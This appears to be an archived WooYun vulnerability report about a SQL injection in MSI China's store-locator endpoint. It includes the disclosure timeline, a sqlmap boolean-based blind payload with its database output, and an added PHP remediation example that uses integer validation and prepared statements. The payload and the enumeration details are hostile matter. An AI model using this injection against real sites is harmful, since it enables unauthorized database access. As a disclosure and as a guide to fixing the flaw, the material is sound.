
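Vulnerability summary

Bug ID: wooyun-2015-0153086

Title: SQL injection vulnerability in the MSI (微星) China official website

Vendor: MSI (微星)

Author: 染血の雪

Submitted: 2015-11-11 09:32

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]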


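Vulnerability details

Disclosure status:

2015-11-11: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and experts in related fields
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

On Double 11, a buddy wanted to buy a laptop and asked me which brand is good.

Detailed description: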

url:

http://**.**.**.**/wheretobuy/autocomplete


post:

country_id=135791&city_id=135791&category_id=135791


payload:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: country_id=135791&city_id=135791&category_id=135791' RLIKE (SELECT (CASE WHEN (1079=1079) THEN 135791 ELSE 0x28 END)) AND 'beRI'='beRI
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5


Proof of vulnerability:


Database: cms_online
[97 tables]


Fix:

As long as it isn't ignored, there is always a way.

Copyright notice: when reposting, please credit the source 染血の雪@乌云
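
One way to close this class of injection on an endpoint like the one in the report, as an added example that is not code from the report or from the affected site: the three ids are validated as integers and reach the database only through a prepared statement. The `stores` table, its columns and both function names are hypothetical, and in-memory SQLite stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example; not the affected site's code. The table "stores", its columns
// and both function names are hypothetical. SQLite stands in for MySQL.

// Return the named POST field as an integer >= 0, or throw.
function require_id(array $post, $name)
{
    $raw = isset($post[$name]) ? $post[$name] : null;
    $id = filter_var($raw, FILTER_VALIDATE_INT, array('options' => array('min_range' => 0)));
    if ($id === false) {
        throw new InvalidArgumentException("invalid $name");
    }
    return $id;
}

// Look up store names; every id reaches the database only as a bound integer.
function autocomplete(PDO $db, array $post)
{
    $stmt = $db->prepare(
        'SELECT name FROM stores
          WHERE country_id = :country_id AND city_id = :city_id AND category_id = :category_id'
    );
    foreach (array('country_id', 'city_id', 'category_id') as $field) {
        $stmt->bindValue(':' . $field, require_id($post, $field), PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false on the connection.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE stores (name TEXT, country_id INT, city_id INT, category_id INT)');
$db->exec("INSERT INTO stores VALUES ('Constructed Store', 135791, 135791, 135791)");

// Constructed requests: the normal body and the tampered body quoted in the report.
$bodies = array(
    'country_id=135791&city_id=135791&category_id=135791',
    "country_id=135791&city_id=135791&category_id=135791' RLIKE (SELECT (CASE WHEN (1079=1079) THEN 135791 ELSE 0x28 END)) AND 'beRI'='beRI",
);
foreach ($bodies as $body) {
    parse_str($body, $post);
    try {
        echo json_encode(autocomplete($db, $post)), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The integer check alone stops the quoted payload, and the bound parameters keep the query structure fixed even if a later change loosens the validation.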


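Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-11-23 11:35

Vendor reply:

CNVD did not reproduce the described situation; CNVD has notified the website's managing organization through the contact information published on the site.

Latest status:

None yet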